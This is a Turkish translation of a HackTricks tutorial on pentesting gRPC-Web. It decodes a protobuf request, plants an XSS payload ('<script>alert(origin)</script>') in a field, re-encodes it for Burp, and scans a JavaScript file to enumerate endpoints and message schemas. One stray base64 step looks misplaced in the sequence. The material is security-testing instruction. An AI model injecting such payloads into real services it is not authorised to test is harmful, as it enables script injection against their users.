mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
165 lines
8.4 KiB
Markdown
165 lines
8.4 KiB
Markdown
# gRPC-Web Pentest
|
||
|
||
<details>
|
||
|
||
<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||
|
||
HackTricks'ı desteklemenin diğer yolları:
|
||
|
||
* **Şirketinizi HackTricks'te reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
|
||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin**.
|
||
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
|
||
|
||
</details>
|
||
|
||
## **gRPC-Web Payloadlarını Manipüle Etmek**
|
||
gRPC-Web, isteklerde `application/grpc-web-text` Content-Type kullanır, bu da protobuf'ün base64 kodlu hali gibidir. [gprc-coder](https://github.com/nxenon/grpc-pentest-suite) aracını kullanabilir ve ayrıca [Burp Suite Eklentisini](https://github.com/nxenon/grpc-pentest-suite) yükleyebilirsiniz.
|
||
|
||
### **gGRPC Coder Aracıyla El ile**
|
||
1. İlk olarak payload'u çözün:
|
||
```bash
|
||
echo "AAAAABYSC0FtaW4gTmFzaXJpGDY6BVhlbm9u" | python3 grpc-coder.py --decode --type grpc-web-text | protoscope > out.txt
|
||
```
|
||
2. Kod çözülmüş yükün içeriğini düzenleyin
|
||
```
|
||
nano out.txt
|
||
2: {"Amin Nasiri Xenon GRPC"}
|
||
3: 54
|
||
7: {"<script>alert(origin)</script>"}
|
||
```
|
||
3. Yeni yükü kodlayın
|
||
|
||
```bash
|
||
$ echo -n 'PAYLOAD' | base64
|
||
```
|
||
|
||
Bu komut, PAYLOAD'u base64 formatında kodlar. Sonuç, yeni payload'unuz olacaktır.
|
||
```bash
|
||
protoscope -s out.txt | python3 grpc-coder.py --encode --type grpc-web-text
|
||
```
|
||
4. Burp interceptor'da çıktıyı kullanın:
|
||
```
|
||
AAAAADoSFkFtaW4gTmFzaXJpIFhlbm9uIEdSUEMYNjoePHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+
|
||
```
|
||
### **gRPC-Web Coder Burp Suite Uzantısı ile El ile Kullanım**
|
||
[gRPC-Web Pentest Suite](https://github.com/nxenon/grpc-pentest-suite) içerisindeki gRPC-Web Coder Burp Suite Uzantısını kullanabilirsiniz, bu daha kolaydır. Kurulum ve kullanım talimatlarını depoda okuyabilirsiniz.
|
||
|
||
## **gRPC-Web Javascript Dosyalarının Analizi**
|
||
Her gRPC-Web uygulamasında en az bir Javascript dosyası bulunur. Dosyayı analiz ederek yeni mesajları, uç noktaları ve servisleri bulabilirsiniz. [gRPC-Scan](https://github.com/nxenon/grpc-pentest-suite) aracını deneyin.
|
||
1. Javascript gRPC-Web dosyasını indirin.
|
||
2. grpc-scan.py ile tarayın:
|
||
```bash
|
||
python3 grpc-scan.py --file main.js
|
||
```
|
||
3. Çıktıyı analiz edin ve yeni uç noktaları ve yeni hizmetleri test edin:
|
||
```
|
||
Output:
|
||
Found Endpoints:
|
||
/grpc.gateway.testing.EchoService/Echo
|
||
/grpc.gateway.testing.EchoService/EchoAbort
|
||
/grpc.gateway.testing.EchoService/NoOp
|
||
/grpc.gateway.testing.EchoService/ServerStreamingEcho
|
||
/grpc.gateway.testing.EchoService/ServerStreamingEchoAbort
|
||
|
||
Found Messages:
|
||
|
||
grpc.gateway.testing.EchoRequest:
|
||
+------------+--------------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+============+====================+==============+
|
||
| Message | Proto3StringField | 1 |
|
||
+------------+--------------------+--------------+
|
||
| Name | Proto3StringField | 2 |
|
||
+------------+--------------------+--------------+
|
||
| Age | Proto3IntField | 3 |
|
||
+------------+--------------------+--------------+
|
||
| IsAdmin | Proto3BooleanField | 4 |
|
||
+------------+--------------------+--------------+
|
||
| Weight | Proto3FloatField | 5 |
|
||
+------------+--------------------+--------------+
|
||
| Test | Proto3StringField | 6 |
|
||
+------------+--------------------+--------------+
|
||
| Test2 | Proto3StringField | 7 |
|
||
+------------+--------------------+--------------+
|
||
| Test3 | Proto3StringField | 16 |
|
||
+------------+--------------------+--------------+
|
||
| Test4 | Proto3StringField | 20 |
|
||
+------------+--------------------+--------------+
|
||
|
||
grpc.gateway.testing.EchoResponse:
|
||
+--------------+--------------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+==============+====================+==============+
|
||
| Message | Proto3StringField | 1 |
|
||
+--------------+--------------------+--------------+
|
||
| Name | Proto3StringField | 2 |
|
||
+--------------+--------------------+--------------+
|
||
| Age | Proto3IntField | 3 |
|
||
+--------------+--------------------+--------------+
|
||
| IsAdmin | Proto3BooleanField | 4 |
|
||
+--------------+--------------------+--------------+
|
||
| Weight | Proto3FloatField | 5 |
|
||
+--------------+--------------------+--------------+
|
||
| Test | Proto3StringField | 6 |
|
||
+--------------+--------------------+--------------+
|
||
| Test2 | Proto3StringField | 7 |
|
||
+--------------+--------------------+--------------+
|
||
| Test3 | Proto3StringField | 16 |
|
||
+--------------+--------------------+--------------+
|
||
| Test4 | Proto3StringField | 20 |
|
||
+--------------+--------------------+--------------+
|
||
| MessageCount | Proto3IntField | 8 |
|
||
+--------------+--------------------+--------------+
|
||
|
||
grpc.gateway.testing.ServerStreamingEchoRequest:
|
||
+-----------------+-------------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+=================+===================+==============+
|
||
| Message | Proto3StringField | 1 |
|
||
+-----------------+-------------------+--------------+
|
||
| MessageCount | Proto3IntField | 2 |
|
||
+-----------------+-------------------+--------------+
|
||
| MessageInterval | Proto3IntField | 3 |
|
||
+-----------------+-------------------+--------------+
|
||
|
||
grpc.gateway.testing.ServerStreamingEchoResponse:
|
||
+------------+-------------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+============+===================+==============+
|
||
| Message | Proto3StringField | 1 |
|
||
+------------+-------------------+--------------+
|
||
|
||
grpc.gateway.testing.ClientStreamingEchoRequest:
|
||
+------------+-------------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+============+===================+==============+
|
||
| Message | Proto3StringField | 1 |
|
||
+------------+-------------------+--------------+
|
||
|
||
grpc.gateway.testing.ClientStreamingEchoResponse:
|
||
+--------------+----------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+==============+================+==============+
|
||
| MessageCount | Proto3IntField | 1 |
|
||
+--------------+----------------+--------------+
|
||
```
|
||
## Referanslar
|
||
|
||
* [Amin Nasiri tarafından yazılan gRPC-Web'e Sızma Makalesi](https://infosecwriteups.com/hacking-into-grpc-web-a54053757a45)
|
||
* [gRPC-Web Pentest Suite](https://github.com/nxenon/grpc-pentest-suite)
|
||
|
||
<details>
|
||
|
||
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
|
||
|
||
HackTricks'i desteklemenin diğer yolları:
|
||
|
||
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** isterseniz, [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
|
||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
|
||
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin.**
|
||
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın.**
|
||
|
||
</details>
|